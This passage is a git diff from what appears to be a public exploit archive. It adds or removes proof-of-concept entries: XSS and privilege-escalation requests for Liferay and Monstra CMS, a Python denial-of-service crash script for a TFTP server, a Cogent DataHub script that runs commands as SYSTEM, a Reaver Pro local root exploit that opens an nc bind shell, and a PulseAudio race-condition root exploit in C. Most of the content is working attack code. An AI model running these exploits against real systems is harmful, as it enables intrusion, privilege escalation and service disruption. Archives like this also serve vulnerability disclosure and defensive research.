http://localhost:8082/user/test/home?p_p_id=79&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_79_struts_action=%2Fenterprise_admin%2Fedit_user&_79_redirect=http%3A%2F%2Flocalhost%3A8082%2Fuser%2Ftest%2Fhome%3Fp_p_id%3D79%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_79_struts_action%3D%252Fenterprise_admin%252Fview%26_79_tabs1%3Dusers%26_79_tabs2%3D%26_79_tabs3%3D%26_79_keywords%3D%26_79_advancedSearch%3Dfalse%26_79_andOperator%3Dtrue%26_79_firstName%3D%26_79_middleName%3D%26_79_lastName%3D%26_79_screenName%3D%26_79_emailAddress%3D%26_79_active%3Dtrue%26_79_organizationId%3D0%26_79_roleId%3D0%26_79_userGroupId%3D0%26_79_cur%3D1&_79_p_u_i_d=10301 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: LFR_SESSION_STATE_10127=1459071499499; COOKIE_SUPPORT=true; JSESSIONID=F53EC8D33C0D3ED9AD62FDA0BB682201; COMPANY_ID=10106; ID=7a31746f4f4c712f4179453d; PASSWORD=4e4c77485138744d61356f3d; LOGIN=74657374406c6966657261792e636f6d; SCREEN_NAME=4e4c77485138744d61356f3d; GUEST_LANGUAGE_ID=en_US +Connection: close + +_79_cmd=update&_79_tabs2=display&_79_tabs3=email-addresses&_79_tabs4=phone-numbers&_79_redirect=http%3A%2F%2Flocalhost%3A8082%2Fuser%2Ftest%2Fhome%3Fp_p_id%3D79%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_79_struts_action%3D%252Fenterprise_admin%252Fedit_user%26_79_tabs2%3Ddisplay%26_79_tabs3%3Demail-addresses%26_79_tabs4%3Dphone-numbers%26_79_backURL%3Dhttp%253A%252F%252Flocalhost%253A8082%252Fuser%252Ftest%252Fhome%253Fp_p_id%253D79%2526p_p_lifecycle%253D0%2526p_p_state%253Dmaximized%2526p_p_mode%253Dview%2526_79_struts_action%253D%25252Fenterprise_admin%25252Fview%2526_79_tabs1%253Dusers%2526_79_tabs2%253D%2526_79_tabs3%253D%2526_79_keywords%253D%2526_79_advancedSearch%253Dfalse%2526_79_andOperator%253Dtrue%2526_79_firstName%253D%2526_79_middleName%253D%2526_79_lastName%253D%2526_79_screenName%253D%2526_79_emailAddress%253D%2526_79_active%253Dtrue%2526_79_organizationId%253D0%2526_79_roleId%253D0%2526_79_userGroupId%253D0%2526_79_cur%253D1%26_79_p_u_i_d%3D&_79_backURL=http%3A%2F%2Flocalhost%3A8082%2Fuser%2Ftest%2Fhome%3Fp_p_id%3D79%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_79_struts_action%3D%252Fenterprise_admin%252Fview%26_79_tabs1%3Dusers%26_79_tabs2%3D%26_79_tabs3%3D%26_79_keywords%3D%26_79_advancedSearch%3Dfalse%26_79_andOperator%3Dtrue%26_79_firstName%3D%26_79_middleName%3D%26_79_lastName%3D%26_79_screenName%3D%26_79_emailAddress%3D%26_79_active%3Dtrue%26_79_organizationId%3D0%26_79_roleId%3D0%26_79_userGroupId%3D0%26_79_cur%3D1&_79_p_u_i_d=10301&_79_tabs1TabsScroll=&_79_screenName=user&_79_emailAddress=user%40xyz.com&_79_prefixId=&_79_firstName=John&_79_middleName=&_79_lastName=Hopkins&_79_suffixId=&_79_birthdayMonth=0&_79_birthdayDay=1&_79_birthdayYear=1970&_79_male=1&_79_organizationIds=&_79_organizationNames=&_79_jobTitle=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&_79_tabs2TabsScroll=&_79_languageId=en_US&_79_timeZoneId=Pacific%2FMidway&_79_greeting=Welcome+John+Hopkins%21&_79_password1=&_79_password2=&_79_passwordReset=false&_79_tabs3TabsScroll=&_79_tabs4TabsScroll=&_79_openId=&_79_smsSn=&_79_aimSn=&_79_icqSn=&_79_jabberSn=&_79_msnSn=&_79_skypeSn=&_79_ymSn=&_79_facebookSn=&_79_mySpaceSn=&_79_twitterSn=&_79_announcementsTypegeneralEmail=false&_79_announcementsTypegeneralSms=false&_79_announcementsTypegeneralWebsite=true&_79_announcementsTypegeneralWebsiteCheckbox=on&_79_announcementsTypenewsEmail=false&_79_announcementsTypenewsSms=false&_79_announcementsTypenewsWebsite=true&_79_announcementsTypenewsWebsiteCheckbox=on&_79_announcementsTypetestEmail=false&_79_announcementsTypetestSms=false&_79_announcementsTypetestWebsite=true&_79_announcementsTypetestWebsiteCheckbox=on&_79_tabs1TabsScroll=&_79_comments= + +3. Solution: + +Issue has been resolved in newer versions. Upgrade to 6.1 CE or newer. \ No newline at end of file diff --git a/platforms/php/webapps/39567.txt b/platforms/php/webapps/39567.txt new file mode 100755 index 000000000..359b234e4 --- /dev/null +++ b/platforms/php/webapps/39567.txt @@ -0,0 +1,133 @@ +Exploit Title: Monstra CMS 3.0.3 - Privilege Escalation / Remote Password Change +Google Dork: intext:"Powered by Monstra"/users/registration +Date: 2016-03-28 +Exploit Author: Sarim Kiani +Vendor Homepage: http://monstra.org +Software Link: http://monstra.org/download +Version: 3.0.3 +Tested on: Windows OS + +==================== TIMELINE ==================== +- Discovery Date: March 16 2016 +- Disclosed to Vendor: March 22 2016 +- Vendor Fixed the Issue: March 27 2016 +================================================== + +Bug Tracking ID: Github Issue # 405 +Link: https://github.com/monstra-cms/monstra/issues/405 + +Application Description: Monstra is a modern light weighted Content Management System written in php. + +1. Vulnerability Description: + +Any user can change credentials of other users including the Administrator credentials. This can allow the attacker to gain Administrator access and completely compromise the application. + +Once logged in as a regular user or successfully registering as a new user, use the following URL to gain information (username) of other users: +http://localhost/monstra-3.0.3/users/1 + +The digit '1' is of Admin or first user created in the database. By changing the digit, all registered usernames can be found. + +Then by using the 'Edit Profile' option of own user account, password of any other user including the Administrator can be changed by changing the POST parameters 'user_id', 'login' and 'new_password'. + + +2. Proof of Concept/Code Flaw: + +`In file monstra\plugins\box\users\users.plugin.php + +Function: getProfileEdit + +Line No: 233 + + if (Users::$users->update(Request::post('user_id'), + array('login' => Security::safeName(Request::post('login')), + 'firstname' => Request::post('firstname'), + 'lastname' => Request::post('lastname'), + 'email' => Request::post('email'), + 'skype' => Request::post('skype'), + 'about_me' => Request::post('about_me'), + 'twitter' => Request::post('twitter')))) { + + // Change password + if (trim(Request::post('new_password')) != '') { + Users::$users->update(Request::post('user_id'), array('password' => Security::encryptPassword(trim(Request::post('new_password'))))); + } + + Notification::set('success', __('Your changes have been saved.', 'users')); + Request::redirect(Site::url().'/users/'.$user['id']); + +On editing profile user id is taken from Request::post('user_id'). An attacker can provide any user id on change password funcionality + +Users::$users->update --> updates the password` + +Header: + +> POST /monstra-3.0.3/users/8/edit HTTP/1.1 +Host: localhost +Content-Length: 152 +Cache-Control: max-age=0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Origin: http://localhost +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Referer: http://localhost/monstra-3.0.3/users/8/edit +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; has_js=1; PHPSESSID=abtuklkn1r0rjbub01527gjav0; _ga=GA1.1.592562515.1457951975; login_attempts=i%3A4%3B + +csrf=eb616fed8ca93d9de582a4f7d75ee3a3a0d6e3ec&user_id=8&login=user&firstname=&lastname=&email=&twitter=&skype=&about_me=&new_password=&edit_profile=Save + +3. Solution: + +Vendor has resolved the issue, use the patch 'User Security Fix # 406'. + +Link: https://github.com/monstra-cms/monstra/pull/406/commits/2e2a22ee5aafa28771f87c108edea024b618a8d5 + +################################################################################## + +#Exploit Title: Monstra CMS 3.0.3 - Persistent XSS +#Google Dork: intext:"Powered by Monstra" +#Date: 2016-03-16 +#Exploit Author: Sarim Kiani +#Vendor Homepage: http://monstra.org +#Software Link: http://monstra.org/download +#Version: 3.0.3 +#Tested on: Windows OS + + +Monstra is a modern light weighted Content Management System written in php. + + +1. Description + +A Persistent XSS exists in the "Edit Profile" page of the application. + + +2. Proof of Concept + +Any user entering personal information in the "Edit Profile" page of the application can insert XSS Payload in the Form. + +Payload: "> + +The following entries on the page are vulnerable to a Persistent XSS payload: + +'Firstname', 'Lastname', 'Email', 'Twitter', 'Skype' and 'About Me'. + +POST /monstra-3.0.3/users/8/edit HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/monstra-3.0.3/users/8/edit +Cookie: GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; SCREEN_NAME=5374564c7570434448716b3d; SESS7a361a010634612fb69871c3ab2715f1=05e_dlYEnDv4-n3tC89gHEXGp3l-L5CXZY7LNgxFIFg; docebo_session=an9dgdq6rmlg3bv5b29tj45653; PHPSESSID=no30picpa0c5khn86lmcd53cb5; _ga=GA1.1.739562915.1457952544 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 440 + +csrf=685bba70d144b8b8727937b56f5b87e669135fe1&user_id=8&login=user&firstname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&lastname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&twitter=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&skype=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&about_me=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&new_password=&edit_profile=Save + + +3.Solution + +No newer (fixed) versions are currently available. diff --git a/platforms/windows/dos/39627.py b/platforms/windows/dos/39627.py new file mode 100755 index 000000000..5c70ecb3c --- /dev/null +++ b/platforms/windows/dos/39627.py @@ -0,0 +1,24 @@ +# Exploit Title: TallSoft SNMP TFTP Server 1.0.0 - DoS +# Date: 28-03-2016 +# Software Link: http://www.tallsoft.com/snmp_tftpserver.exe +# Exploit Author: Charley Celice (stmerry) +# Contact: https://twitter.com/charleycelice +# +# Credits: Based off TallSoft Quick TFTP Server 2.2 DoS +# * https://www.exploit-db.com/exploits/26010/ +# +# Category: Denial of Service +# Tested on: Windows XP SP3 English +# Details: Remotely crash TallSoft SNMP TFTP Server + +from socket import * +import sys, select + +address = ('127.0.0.1', 69) + +# sufficient for the crash to work +crash = "\x00\x02\x00" +crash += "\x41"*1019 + +server_socket = socket(AF_INET, SOCK_DGRAM) +server_socket.sendto(crash, address) \ No newline at end of file diff --git a/platforms/windows/local/37898.py b/platforms/windows/local/37898.py deleted file mode 100755 index 4c1797a70..000000000 --- a/platforms/windows/local/37898.py +++ /dev/null @@ -1,23 +0,0 @@ -source: http://www.securityfocus.com/bid/55725/info - -Reaver Pro is prone to a local privilege-escalation vulnerability. - -A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers. - -#!/usr/bin/env python -import os -print """ - Reaver Pro Local Root - Exploits a hilarious named pipe flaw. -The named pipe /tmp/exe is open to anyone... -Any command echoed into it gets ran as root. -This simply launches a bindshell on 4444... - Insecurety Research | insecurety.net -""" -print "" -print "This is why TacNetSol should hire me?" -print "[+] Sending command to named pipe..." -cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe''' -os.system(cmd) -print "[+] Connecting to bind shell, enjoy root!" -os.system("nc -v localhost 4444") diff --git a/platforms/windows/local/39630.g b/platforms/windows/local/39630.g new file mode 100755 index 000000000..ed6ece3f6 --- /dev/null +++ b/platforms/windows/local/39630.g @@ -0,0 +1,65 @@ +/* + +# Exploit Title: Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability +# Google Dork: lol +# Date: 28/3/2016 +# Exploit Author: mr_me +# Vendor Homepage: http://www.cogentdatahub.com/ +# Software Link: http://www.cogentdatahub.com/Contact_Form.html +# Version: <= 7.3.9 +# Tested on: Windows 7 x86 +# CVE : CVE‑2016-2288 + +sha1sum: c1806faf0225d0c7f96848cb9799b15f8b249792 CogentDataHub-7.3.9-150902-Windows.exe +Advsiory: https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01 + +Timeline: +========= +- 02/12/2015 : vuln found, case opened to the zdi +- 09/02/2016 : case rejected (not interested in this vuln due to vector) +- 26/02/2016 : reported to ICS-CERT +- 24/03/2016 : advisory released + +Notes: +====== +- to reach SYSTEM, the service needs to be installed via the Service Manager +- the service doesnt need to be installed, as long as 'C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe' has been executed by a privileged user +- an attacker does NOT need to restart the machine or the service in order to EP, the service just polls for the Gamma Script + +Exploitation: +============= + +As a Guest user (or low privileged user) save this file as 'WebstreamSupport.g' into C:\usr\cogent\require\ and enjoy the free SYSTEM calcs. Most OS's dont allow +a write into c:\ as guest, but we are in the SCADA world. Anything is possible. + +C:\Users\steven>sc qc "Cogent DataHub" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Cogent DataHub + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe" -H "C:\Users\steven\AppData\Roaming\Cogent DataHub" + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Cogent DataHub + DEPENDENCIES : RPCSS + SERVICE_START_NAME : LocalSystem + +C:\Users\steven> +*/ + +require ("Application"); +require ("AsyncRun"); // thanks to our friends @ Cogent + +class WebstreamSupport Application +{ + +} + +method WebstreamSupport.constructor () +{ + RunCommandAsync(nil, nil, "cmd.exe /c calc", "c:\\"); +} + +Webstream = ApplicationSingleton (WebstreamSupport); diff --git a/platforms/windows/local/9207.sh b/platforms/windows/local/9207.sh deleted file mode 100755 index 31847aec0..000000000 --- a/platforms/windows/local/9207.sh +++ /dev/null @@ -1,183 +0,0 @@ -#!/bin/bash - -pulseaudio=`which pulseaudio` -workdir="/tmp" -#workdir=$HOME -id=`which id` -shell=`which sh` - -trap cleanup INT - -function cleanup() -{ - rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c - rm -rf $workdir/PATMP* -} - -cat > $workdir/pa_race.c << __EOF__ -#include -#include -#include -#include -#include -#include - -#define PULSEAUDIO_PATH "$pulseaudio" -#define SH_PATH "$workdir/sh" -#define TMPDIR_TEMPLATE "$workdir/PATMPXXXXXX" - -void _pause(long sec, long usec); - -int main(int argc, char *argv[], char *envp[]) -{ - int status; - pid_t pid; - char template[sizeof(TMPDIR_TEMPLATE)]; - char *tmpdir; - char hardlink[sizeof(template) + 2]; - char hardlink2[sizeof(template) + 12]; - - srand(time(NULL)); - - for( ; ; ) - { - snprintf(template, sizeof(template), "%s", TMPDIR_TEMPLATE); - template[sizeof(template) - 1] = '\0'; - - tmpdir = mkdtemp(template); - if(tmpdir == NULL) - { - perror("mkdtemp"); - return 1; - } - - snprintf(hardlink, sizeof(hardlink), "%s/A", tmpdir); - hardlink[sizeof(hardlink) - 1] = '\0'; - - snprintf(hardlink2, sizeof(hardlink2), "%s/A (deleted)", tmpdir); - hardlink2[sizeof(hardlink2) - 1] = '\0'; - - /* this fails if $workdir is a different partition */ - if(link(PULSEAUDIO_PATH, hardlink) == -1) - { - perror("link"); - return 1; - } - - if(link(SH_PATH, hardlink2) == -1) - { - perror("link"); - return 1; - } - - pid = fork(); - - if(pid == 0) - { - char *argv[] = {hardlink, NULL}; - char *envp[] = {NULL}; - - execve(hardlink, argv, envp); - - perror("execve"); - return 1; - } - - if(pid == -1) - { - perror("fork"); - return 1; - } - else - { - /* tweak this if exploit does not work */ - _pause(0, rand() % 500); - - if(unlink(hardlink) == -1) - { - perror("unlink"); - return 1; - } - - if(link(SH_PATH, hardlink) == -1) - { - perror("link"); - return 1; - } - waitpid(pid, &status, 0); - } - - if(unlink(hardlink) == -1) - { - perror("unlink"); - return 1; - } - - if(unlink(hardlink2) == -1) - { - perror("unlink"); - return 1; - } - - if(rmdir(tmpdir) == -1) - { - perror("rmdir"); - return 1; - } - } - - return 0; -} - -void _pause(long sec, long usec) -{ - struct timeval timeout; - - timeout.tv_sec = sec; - timeout.tv_usec = usec; - - if(select(0, NULL, NULL, NULL, &timeout) == -1) - { - perror("select"); - } -} -__EOF__ - -cat > $workdir/sh.c << __EOF__ -#include -#include -#include -#include - - -int main(int argc, char *argv[], char *envp[]) -{ - if(geteuid() != 0) - { - return 1; - } - - setuid(0); - setgid(0); - - if(fork() == 0) - { - argv[0] = "$id"; - argv[1] = NULL; - execve(argv[0], argv, envp); - return 1; - } - - argv[0] = "$shell"; - argv[1] = NULL; - execve(argv[0], argv, envp); - return 1; -} -__EOF__ - -gcc -o $workdir/pa_race $workdir/pa_race.c -gcc -o $workdir/sh $workdir/sh.c - -$workdir/pa_race - -# milw0rm.com [2009-07-20]